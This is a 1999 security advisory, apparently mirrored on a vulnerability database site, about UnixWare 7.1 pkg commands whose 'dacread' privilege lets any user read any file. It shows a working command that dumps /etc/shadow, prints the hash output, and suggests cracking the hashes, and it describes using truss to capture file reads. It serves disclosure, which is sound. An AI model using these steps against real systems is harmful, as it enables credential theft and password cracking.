Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

unixware.pkg.txt

🗓️ 06 Dec 1999 00:00:00Reported by Brock TellierType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 34 Views

UnixWare allows any user to read files due to vulnerabilities in pkg commands and privilege settings.

Code
`Greetings,  
  
OVERVIEW  
Any user may read any file on the system.  
  
BACKGROUND  
Only UnixWare 7.1 has been tested.  
  
DETAILS  
As previously stated, UnixWare binaries gain additional privileges via  
standard suid/sgid AND /etc/security/tcb/privs. The majority of the UnixWare  
"pkg" command, such as pkginfo, pkgcat, pkgparam, etc, are vulnerable to   
a bug  
which will allow any user to read any file on the system as a result of their  
additional "dacread" permission in the privs file.  
  
The dacread permission allows a process to override the Discretionary Access  
Controls (DAC) for read-only operations. Basically, a process with the  
dacread permissions is able to bypass the mode bits and ownership on a file,  
but only for reading it. A process with dacwrite permissions can bypass mode  
bits to write to or execute that file.  
  
I'm pretty sure that the bugs I found in the pkg commands were introduced by  
their addition to the privs file. As far as I can tell, there is virtual ly no  
reason for them to be able to read any file on the system.   
  
  
All around, this additional privilege thing, well, sucks. Consider now that  
the truss(1) command will allow the user to see any file i/o that happens  
  
between a process and the system since it isn't suid/sgid. Thus, if there is  
*any* way that you can make pkg* read from a file, even if the output is never  
printed, you can examine truss output to get the file's contents.  
  
EXPLOIT  
The worst offender of pkg* is pkgparam, which will print the contents of a  
file to stdout, though I've been able to get most of the pkg program to read  
from /etc/shadow in one way or another and grab the contents with truss.  
  
bash-2.02$ ls -la /bin/pkgparam  
-r-xr-xr-x 1 root sys 166784 May 21 1999  
/bin/pkgparam  
bash-2.02$ /bin/pkgparam -f /etc/shadow  
Dy0l3OC7XHsj.:10925::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
NP:6445::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
BgusHRQZ9MH2U:10878::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
*LK*:::::::  
nv.Xrh2V3vArc:10882::::::  
ozT.yeRe1/dxY:10882::::::  
RinwpQfqabYbc:10928::::::  
bash-2.02$   
  
Now just concatenate the first field of /etc/passwd with this file and run  
your favorite cracker.  
  
Brock Tellier  
UNIX Systems Administrator  
Chicago, IL, USA  
[email protected]  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Dec 1999 00:00Current
unixware 7.1file accessprivilege escalationbug exploitationdiscretionary access controlspkg commandstruss command/etc/shadow.
34